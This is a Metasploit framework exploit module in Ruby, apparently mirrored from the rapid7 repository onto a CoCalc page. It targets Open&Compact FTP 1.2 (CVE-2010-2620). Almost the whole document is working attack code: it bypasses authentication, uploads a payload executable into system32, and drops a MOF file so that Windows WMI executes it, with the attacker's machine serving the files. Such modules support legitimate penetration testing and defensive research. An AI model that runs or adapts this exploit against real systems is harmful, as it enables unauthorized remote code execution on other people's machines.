Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/open_ftpd_wbem.rb
19669 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Ftp

10
  include Msf::Exploit::Remote::TcpServer

11
  include Msf::Exploit::EXE

12
  include Msf::Exploit::WbemExec

13
  include Msf::Exploit::FileDropper

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => "Open-FTPD 1.2 Arbitrary File Upload",

20
        'Description' => %q{

21
          This module exploits multiple vulnerabilities found in Open&Compact FTP

22
          server. The software contains an authentication bypass vulnerability and a

23
          arbitrary file upload vulnerability that allows a remote attacker to write

24
          arbitrary files to the file system as long as there is at least one user

25
          who has permission.

26


27
          Code execution can be achieved by first uploading the payload to the remote

28
          machine as an exe file, and then upload another mof file, which enables

29
          WMI (Management Instrumentation service) to execute the uploaded payload.

30
          Please note that this module currently only works for Windows before Vista.

31
        },

32
        'License' => MSF_LICENSE,

33
        'Author' => [

34
          'Serge Gorbunov', # Initial discovery

35
          'bcoles', # Metasploit

36
        ],

37
        'References' => [

38
          ['OSVDB', '65687'],

39
          ['EDB', '13932'],

40
          ['CVE', '2010-2620']

41
        ],

42
        'Payload' => {

43
          'BadChars' => "\x00",

44
        },

45
        'Platform' => 'win',

46
        'Stance' => Msf::Exploit::Stance::Aggressive,

47
        'Targets' => [

48
          # Tested on version 1.2 - Windows XP SP3 (EN)

49
          ['Open&Compact FTP 1.2 on Windows (Before Vista)', {}]

50
        ],

51
        'Privileged' => true,

52
        'DisclosureDate' => '2012-06-18',

53
        'DefaultTarget' => 0,

54
        'Notes' => {

55
          'Reliability' => UNKNOWN_RELIABILITY,

56
          'Stability' => UNKNOWN_STABILITY,

57
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

58
        }

59
      )

60
    )

61


62
    register_options([

63
      OptString.new('PATH', [true, 'The local Windows path', "C:/WINDOWS/"]),

64
      OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080])

65
    ])

66
    deregister_options('FTPUSER', 'FTPPASS') # Using authentication bypass

67
  end

68


69
  def check

70
    connect

71
    disconnect

72


73
    if banner =~ /\*\*        Welcome on       \*\*/

74
      return Exploit::CheckCode::Detected

75
    else

76
      return Exploit::CheckCode::Unknown

77
    end

78
  end

79


80
  def on_client_connect(cli)

81
    peer = "#{cli.peerhost}:#{cli.peerport}"

82


83
    case @stage

84
    when :exe

85
      print_status("Sending executable (#{@exe.length.to_s} bytes)")

86
      cli.put(@exe)

87
      @stage = :mof

88
    when :mof

89
      print_status("Sending MOF (#{@mof.length.to_s} bytes)")

90
      cli.put(@mof)

91
    end

92


93
    cli.close

94
  end

95


96
  # Largely stolen from freefloatftp_wbem.rb

97
  def upload(filename)

98
    select(nil, nil, nil, 1)

99


100
    peer = "#{rhost}:#{rport}"

101
    print_status("Trying to upload #{::File.basename(filename)}")

102
    conn = connect(false, datastore['VERBOSE'])

103
    if not conn

104
      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")

105
    end

106


107
    # Switch to binary mode

108
    print_status("Set binary mode")

109
    send_cmd(['TYPE', 'I'], true, conn)

110


111
    # Prepare active mode: Get attacker's IP and source port

112
    src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']

113
    src_port = datastore['SRVPORT'].to_i

114


115
    # Prepare active mode: Convert the IP and port for active mode

116
    src_ip = src_ip.gsub(/\./, ',')

117
    src_port = "#{src_port / 256},#{src_port.remainder(256)}"

118


119
    # Set to active mode

120
    print_status("Set active mode \"#{src_ip},#{src_port}\"")

121
    send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)

122


123
    # Tell the FTP server to download our file

124
    send_cmd(['STOR', filename], false, conn)

125


126
    print_good("Upload successful")

127
    disconnect(conn)

128
  end

129


130
  # Largely stolen from freefloatftp_wbem.rb

131
  def exploit

132
    path = datastore['PATH']

133
    exe_name = "#{path}/system32/#{rand_text_alpha(rand(10) + 5)}.exe"

134
    mof_name = "#{path}/system32/wbem/mof/#{rand_text_alpha(rand(10) + 5)}.mof"

135
    @mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))

136
    @exe = generate_payload_exe

137
    @stage = :exe

138


139
    begin

140
      t = framework.threads.spawn("reqs", false) {

141
        begin

142
          # Upload our malicious executable

143
          u = upload(exe_name)

144
          # Upload the mof file

145
          upload(mof_name) if u

146
          register_file_for_cleanup("#{::File.basename(exe_name)}")

147
          register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")

148
        rescue ::Exception => e

149
          print_error "Upload Failed: #{e.message}"

150
          cleanup

151
        end

152
      }

153


154
      super

155
    ensure

156
      t.kill

157
    end

158
  end

159
end

160


161